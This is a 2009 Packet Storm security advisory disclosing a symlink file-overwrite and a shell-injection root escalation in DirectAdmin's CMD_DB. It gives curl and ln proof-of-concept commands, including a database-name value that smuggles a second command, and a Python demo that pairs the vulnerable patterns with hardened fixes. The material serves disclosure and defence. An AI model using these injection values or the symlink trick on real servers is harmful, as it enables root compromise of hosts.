DirectAdmin Local File Overwrite

2009-04-22T00:00:00
ID PACKETSTORM:76908
Type packetstorm
Reporter anonymous
Modified 2009-04-22T00:00:00

Description

Subject: DirectAdmin < 1.33.4 Local file overwrite & Local root escalation
  
Author: Anonymous  
ReleaseID: d8253f15e447935c24ab38a215735931942a77717d7b55d84200d070d1e54d3b  
Date: 22-04-2009  
  
The issue on http://www.directadmin.com/features.php?id=968 is larger than  
the wording would indicate.  
  
It fixes two issues in /CMD_DB.  
  
--- Local file overwrite ---  
  
action=backup runs a mysqldump as root and writes it to a predictable path in
the temporary directory configured as tmpdir in /usr/local/directadmin/conf:
"$tmpdir/${dbname}.gz". It neither checks whether that path already exists nor
refuses to follow a symlink there before piping the output of "mysqldump |
gzip" into it, so any DA user who can plant a symlink in tmpdir can create or
overwrite any file on the server as root (the file contents are the dump).
  
PoC:  
  
On server: $ ln -s /etc/poc /home/tmp/database_name.gz  
On client: $ curl http://directadminserver:2222/CMD_DB/database_name.gz  
On server:  
$ ls -la /etc/poc  
-rw-r--r-- 1 root root 514 Apr 22 09:05 /etc/poc  
$ zcat /etc/poc | head -1  
-- MySQL dump 10.9  
  
--- Local root escalation ---  
  
action=restore runs "gunzip | mysql $dbname" through a shell as root, with
$dbname (the "name" form field) passed through unchecked, so shell
metacharacters in it let any DA user run arbitrary commands as root.
  
PoC:  
  
On client: curl -n -F action=restore -F domain=poc.com -F
'file1=@database.gz' -F method=default -F 'name=poc_db;echo test > /etc/poc'
http://directadminserver:2222/CMD_DB
On server:  
$ ls -la /etc/poc  
-rw-r--r-- 1 root root 5 Apr 22 10:30 /etc/poc  
$ cat /etc/poc  
test  
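Both bugs in miniature, as an added example that is not part of the advisory and is not DirectAdmin's code: a predictable "$tmpdir/$dbname.gz" opened for writing (which follows a planted symlink) beside an O_CREAT|O_EXCL|O_NOFOLLOW open that refuses, and a database name interpolated into a shell string beside a validated name passed as a discrete argv element. The allowed-name regex, the function names and the throwaway directory standing in for tmpdir and /etc/poc are all assumptions made for this illustration; everything runs as an unprivileged user.

```python
"""
Constructed miniature of the two CMD_DB flaws described above, each beside a
hardened form.  Not DirectAdmin's code; the paths and the name policy are
assumptions for the demonstration.  Runs unprivileged in a temp directory.
"""
import os
import re
import subprocess
import tempfile
from pathlib import Path

# Assumed policy: MySQL database names as a control panel would create them.
# Anything else is rejected before it reaches a path or a command line.
DBNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")


def validate_dbname(dbname: str) -> str:
    """Return dbname unchanged if it is safe to use, else raise ValueError."""
    if not DBNAME_RE.match(dbname):
        raise ValueError(f"rejected database name: {dbname!r}")
    return dbname


# --- flaw 1: predictable temp file, symlink followed -------------------------

def vulnerable_backup(tmpdir: str, dbname: str, dump: bytes) -> str:
    """Like action=backup: write the dump to "$tmpdir/$dbname.gz" without
    checking what is already there.  open() follows a planted symlink, so
    the bytes land on the symlink's target."""
    path = os.path.join(tmpdir, f"{dbname}.gz")
    with open(path, "wb") as f:          # follows symlinks: this is the bug
        f.write(dump)
    return path


def hardened_backup(tmpdir: str, dbname: str, dump: bytes) -> str:
    """Same operation with a validated name and O_CREAT|O_EXCL|O_NOFOLLOW:
    a pre-existing path (symlink or not) makes open() fail with EEXIST
    instead of being written through.  An unpredictable mkstemp() name would
    remove the guessability as well; O_EXCL is what stops the clobber."""
    path = os.path.join(tmpdir, f"{validate_dbname(dbname)}.gz")
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)     # FileExistsError on a planted path
    with os.fdopen(fd, "wb") as f:
        f.write(dump)
    return path


# --- flaw 2: dbname interpolated into a shell command ------------------------

def vulnerable_restore_cmdline(dbname: str) -> str:
    """Like action=restore: one shell string, so ';' in the name terminates
    the mysql command and starts an attacker-chosen one."""
    return f"gunzip | mysql {dbname}"


def hardened_restore_argv(dbname: str) -> list:
    """Validated name passed as its own argv element, no shell involved."""
    return ["mysql", validate_dbname(dbname)]


def run_shell(cmdline: str, cwd: str) -> None:
    """Execute cmdline via /bin/sh, as a shell-string popen would."""
    subprocess.run(cmdline, shell=True, cwd=cwd, check=False,
                   stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL,
                   stderr=subprocess.DEVNULL)


def demo() -> dict:
    """Replay both flaws in a throwaway directory and report what happened."""
    results = {}
    with tempfile.TemporaryDirectory() as base:
        tmpdir = os.path.join(base, "tmp")       # stands in for DA's tmpdir
        os.mkdir(tmpdir)
        target = os.path.join(base, "etc_poc")   # stands in for /etc/poc
        dump = b"-- MySQL dump (constructed sample)\n"

        # Attacker plants the symlink that the backup will write through.
        os.symlink(target, os.path.join(tmpdir, "database_name.gz"))
        vulnerable_backup(tmpdir, "database_name", dump)
        results["symlink_followed"] = (
            os.path.exists(target) and Path(target).read_bytes() == dump)

        # The hardened open refuses the planted path.
        try:
            hardened_backup(tmpdir, "database_name", dump)
            results["hardened_refused"] = False
        except FileExistsError:
            results["hardened_refused"] = True

        # Shell injection through the database name.
        target2 = os.path.join(base, "etc_poc2")
        evil = f"poc_db;echo test > {target2}"
        run_shell(vulnerable_restore_cmdline(evil), cwd=base)
        results["injection_ran"] = (
            os.path.exists(target2) and Path(target2).read_text() == "test\n")

        try:
            hardened_restore_argv(evil)
            results["hardened_rejected_name"] = False
        except ValueError:
            results["hardened_rejected_name"] = True
        results["hardened_argv"] = hardened_restore_argv("poc_db")
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Note that neither gunzip nor mysql needs to be installed for the injection to fire: the shell runs the pipeline, which fails, and then runs the `echo` that followed the `;`, exactly as the advisory's curl does against the real binary. The fix is the combination of the allow-list and argv passing; quoting the name into the shell string would be fragile by comparison.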
  
--   
Anonymous  